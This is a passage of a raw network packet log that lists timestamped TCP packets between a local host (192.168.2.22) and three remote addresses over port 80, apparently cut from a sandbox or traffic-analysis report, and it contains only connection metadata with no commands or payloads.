                        Feb 10, 2022 10:21:50.836402893 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836522102 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836679935 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836715937 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836720943 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836730003 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836745977 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836760044 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836766958 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836776018 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836791039 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836803913 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836812019 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836819887 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836833954 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836849928 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836857080 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836865902 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836879015 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836893082 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836899042 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836909056 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836921930 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836941004 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836944103 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836965084 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836968899 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836977005 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836987019 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836996078 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.837007999 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.837023020 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.837029934 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.837038994 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.837071896 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.837779999 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844257116 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844293118 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844307899 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844330072 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844350100 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844372988 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844379902 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844393015 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844403028 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844412088 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844413042 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844428062 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844436884 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844444990 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844458103 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844475031 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844477892 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844490051 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844501019 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844516039 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844521999 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844538927 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844544888 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844563961 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844567060 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844575882 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844587088 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844609976 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844616890 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844630957 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844634056 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844645977 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844651937 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844664097 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844674110 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844685078 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844696999 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844719887 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844721079 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844733953 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844743967 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844750881 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844765902 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844779968 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844798088 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.845065117 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.948957920 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.948992968 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949007988 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949023008 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949045897 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949068069 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949086905 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949106932 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949107885 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949127913 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949139118 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949141979 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949143887 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949147940 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949162960 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949172020 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949179888 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949194908 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949214935 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949215889 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949232101 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949239016 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949250937 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949278116 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949467897 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949491024 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949513912 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949528933 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954576015 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954602003 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954622984 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954644918 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954665899 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954677105 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954687119 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954699039 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954700947 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954709053 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954719067 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954731941 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954751015 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954756975 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954766989 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954782009 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954797983 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954802990 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954814911 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954827070 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954840899 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954849005 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954869032 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954874039 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954885006 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954895973 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954912901 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954916954 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954929113 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954937935 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954957008 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954957962 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954972029 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954981089 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954998970 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955002069 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955012083 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955024004 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955039978 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955044985 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955054998 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955065966 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955080986 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955086946 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955096960 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955108881 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955128908 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955128908 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955142975 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955149889 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955161095 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955173016 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955188990 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955194950 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955208063 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955218077 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955238104 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955239058 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955250978 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955262899 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955279112 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955292940 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.958271027 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.958297968 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.958314896 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.958336115 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.958359003 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.958374977 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.958379030 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.958393097 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.958395958 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.958400011 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.958412886 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.958429098 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:51.837635040 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:59.727646112 CET4916680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:21:59.748434067 CET8049166172.67.197.66192.168.2.22
                        Feb 10, 2022 10:21:59.748563051 CET4916680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:21:59.753804922 CET4916680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:21:59.769998074 CET8049166172.67.197.66192.168.2.22
                        Feb 10, 2022 10:21:59.770062923 CET4916680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:21:59.786164999 CET8049166172.67.197.66192.168.2.22
                        Feb 10, 2022 10:21:59.836230040 CET8049166172.67.197.66192.168.2.22
                        Feb 10, 2022 10:21:59.836334944 CET8049166172.67.197.66192.168.2.22
                        Feb 10, 2022 10:21:59.836407900 CET4916680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:21:59.836559057 CET4916680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:21:59.852705956 CET8049166172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:02.821213007 CET4916780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:02.837481022 CET8049167172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:02.837610960 CET4916780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:02.840347052 CET4916780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:02.856487989 CET8049167172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:02.856580973 CET4916780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:02.872755051 CET8049167172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:02.975469112 CET8049167172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:02.975771904 CET4916780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:02.975775003 CET8049167172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:02.975845098 CET4916780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:02.991892099 CET8049167172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:03.809348106 CET4916880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:03.825545073 CET8049168172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:03.825649023 CET4916880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:03.831670046 CET4916880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:03.847848892 CET8049168172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:03.848067045 CET4916880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:03.864182949 CET8049168172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:03.955466986 CET8049168172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:03.955637932 CET4916880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:03.955820084 CET8049168172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:03.955868006 CET4916880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:03.971746922 CET8049168172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:04.896179914 CET4916980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:04.914192915 CET8049169172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:04.914287090 CET4916980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:04.920207977 CET4916980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:04.937333107 CET8049169172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:04.937419891 CET4916980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:04.954302073 CET8049169172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:05.027216911 CET8049169172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:05.027276039 CET8049169172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:05.027484894 CET4916980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:05.027533054 CET4916980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:05.045154095 CET8049169172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:05.936275005 CET4917080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:05.952708006 CET8049170104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:05.952825069 CET4917080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:05.958935022 CET4917080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:05.975126028 CET8049170104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:05.975214958 CET4917080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:05.992187977 CET8049170104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:06.048285007 CET8049170104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:06.048335075 CET8049170104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:06.048419952 CET4917080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:06.048474073 CET4917080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:06.065763950 CET8049170104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:06.986953974 CET4917180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:07.003218889 CET8049171172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:07.003308058 CET4917180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:07.006112099 CET4917180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:07.023104906 CET8049171172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:07.023216963 CET4917180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:07.040285110 CET8049171172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:07.110586882 CET8049171172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:07.110697031 CET8049171172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:07.110860109 CET4917180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:07.110909939 CET4917180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:07.127089024 CET8049171172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:08.109112024 CET4917280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:08.125571966 CET8049172104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:08.125680923 CET4917280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:08.131839037 CET4917280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:08.148003101 CET8049172104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:08.148073912 CET4917280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:08.164340973 CET8049172104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:08.291701078 CET8049172104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:08.291745901 CET8049172104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:08.291848898 CET4917280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:08.291922092 CET4917280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:08.308020115 CET8049172104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:09.253694057 CET4917380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:09.270165920 CET8049173172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:09.270242929 CET4917380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:09.274962902 CET4917380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:09.291929960 CET8049173172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:09.292191029 CET4917380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:09.308676958 CET8049173172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:09.407815933 CET8049173172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:09.407835960 CET8049173172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:09.407948971 CET4917380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:09.407998085 CET4917380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:09.425189018 CET8049173172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:10.396043062 CET4917480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:10.412357092 CET8049174104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:10.412508011 CET4917480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:10.415911913 CET4917480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:10.432607889 CET8049174104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:10.432744980 CET4917480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:10.448926926 CET8049174104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:10.503607035 CET8049174104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:10.503706932 CET8049174104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:10.503709078 CET4917480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:10.503747940 CET4917480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:10.519778967 CET8049174104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:11.462559938 CET4917580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:11.478848934 CET8049175104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:11.479021072 CET4917580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:11.483872890 CET4917580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:11.500169039 CET8049175104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:11.500328064 CET4917580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:11.516634941 CET8049175104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:11.594872952 CET8049175104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:11.594969034 CET4917580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:11.595057011 CET8049175104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:11.595097065 CET4917580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:11.611120939 CET8049175104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:12.533207893 CET4917680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:12.549602032 CET8049176172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:12.549736023 CET4917680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:12.553925991 CET4917680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:12.570136070 CET8049176172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:12.570199013 CET4917680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:12.586457014 CET8049176172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:12.721690893 CET8049176172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:12.721822023 CET4917680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:12.721960068 CET8049176172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:12.722008944 CET4917680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:12.738008976 CET8049176172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:13.607547998 CET4917780192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:13.623913050 CET8049177104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:13.624032021 CET4917780192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:13.627098083 CET4917780192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:13.643275023 CET8049177104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:13.643413067 CET4917780192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:13.659606934 CET8049177104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:13.718802929 CET8049177104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:13.718858004 CET8049177104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:13.718951941 CET4917780192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:13.718996048 CET4917780192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:13.735419989 CET8049177104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:14.765177011 CET4917880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:14.781410933 CET8049178172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:14.781538963 CET4917880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:14.784465075 CET4917880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:14.800530910 CET8049178172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:14.800611973 CET4917880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:14.816694021 CET8049178172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:14.920140982 CET8049178172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:14.920171022 CET8049178172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:14.920326948 CET4917880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:14.920541048 CET4917880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:14.936752081 CET8049178172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:15.860728979 CET4917980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:15.876959085 CET8049179172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:15.877051115 CET4917980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:15.879811049 CET4917980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:15.896003008 CET8049179172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:15.896128893 CET4917980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:15.912307024 CET8049179172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:15.963191986 CET8049179172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:15.963282108 CET8049179172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:15.963314056 CET4917980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:15.963339090 CET4917980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:15.979487896 CET8049179172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:17.202990055 CET4918080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:17.219258070 CET8049180172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:17.219337940 CET4918080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:17.221999884 CET4918080192.168.2.22172.67.197.66
